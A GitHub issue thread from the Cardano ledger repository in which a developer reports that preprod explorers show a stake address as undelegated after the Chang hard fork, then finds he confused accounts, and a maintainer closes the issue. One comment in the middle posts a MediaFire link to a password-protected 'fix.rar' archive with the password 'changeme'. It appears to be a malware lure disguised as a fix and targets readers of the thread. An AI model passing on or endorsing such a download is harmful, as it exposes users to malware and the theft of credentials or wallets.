### ISSUE TITLE
Stake reward calculation issues on node 9.1.0?

### ISSUE THREAD

**Issue by zxpectre** [IntersectMBO/cardano-ledger#4568]
Hi! I've raised to a friend at CF and on todays Chang migration for Dapps AMA that I've probably spotted an issue with the new reward calculation that by being present on CardanoScan, CF Explorer Beta and other tooling on top of node 9.1.0 is that I think it may be a node related issue.

Context: Mainnet has not crossed Chang HF yet, preprod has.  

What's expected:
Mainnet address addr1q82wmjzz3f5gmw2andtxaldqph7zwyrrky9e0pd249p9nuadqwj2u3djrag0mene2cm9elu5mdqmcz9zc2rzgq7c5g6q6x6zm0 should be delegated to a pool and have reward history

Preprod address addr_test1qryfcfdfvzsylrlyu5gk842wfp8sqq5sfpn6hvxd8s6h3sadqwj2u3djrag0mene2cm9elu5mdqmcz9zc2rzgq7c5g6qmkdfs3  should be delegated to a pool and have reward history

What's happening:

Mainnet address is showing the right data on explorers.
Preprod address appears as deactivated and not showing reward history.

https://beta.explorer.cardano.org/en/address/addr1q82wmjzz3f5gmw2andtxaldqph7zwyrrky9e0pd249p9nuadqwj2u3djrag0mene2cm9elu5mdqmcz9zc2rzgq7c5g6q6x6zm0
https://cardanoscan.io/address/addr1q82wmjzz3f5gmw2andtxaldqph7zwyrrky9e0pd249p9nuadqwj2u3djrag0mene2cm9elu5mdqmcz9zc2rzgq7c5g6q6x6zm0

https://preprod.beta.explorer.cardano.org/en/address/addr_test1qryfcfdfvzsylrlyu5gk842wfp8sqq5sfpn6hvxd8s6h3sadqwj2u3djrag0mene2cm9elu5mdqmcz9zc2rzgq7c5g6qmkdfs3
https://preprod.cardanoscan.io/address/addr_test1qryfcfdfvzsylrlyu5gk842wfp8sqq5sfpn6hvxd8s6h3sadqwj2u3djrag0mene2cm9elu5mdqmcz9zc2rzgq7c5g6qmkdfs3 

Important: 
Because of other Chang related issues I lost a node setup I had where I was able to support more evidence at least showing glitches on GraphQL on same preprod and mainnet addreses. 

Disclaimer: Apologize if im wrong, or offering poor proof of the situation but I am trying to hurry to reach you before the go/no go date while also solving other Chang related issues. At least explorers should show reward history properly on preprod address. Maybe the delegated pool was de-registered or something im not aware of, still want to share this on time.

## Update:
After having decent time for testing I discovered i was confused with another account, that preprod stake key was never delegated before. Ran a new registration and delegation on it and at least on CardanoScan and 1 of ours cardano-graphql backends reported status is ok. Though at the time of posting https://preprod.beta.explorer.cardano.org/en/staking-lifecycle/delegator/stake_test1uzks8f9wgkep758aueu4vdjul72dksdupz3v9p3yq0v2ydqx8me8y is not showing the updated status.

Still will be double checking our cardano-graphql queries again on mainnet when I get to restablish the broken dbsync deployment I mentioned earlier. 

The hard fork hit us hard with a lot of breaking changes we and some dependencies are still trying to fix. Apologize for the confusion!

**Comment by dirk-seynhaeve** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by lehins** [comment]
> The hard fork hit us hard with a lot of breaking changes we and some dependencies are still trying to fix. Apologize for the confusion!

No worries. Feel free to close the issue once you are sure that ledger behaves as expected.

> The hard fork hit us hard

That is why it is called a "Hard" fork :wink:

Conway has been 2 years in the making, so there are indeed a lot of changes.

**Comment by lehins** [comment]
Closing as not an issue
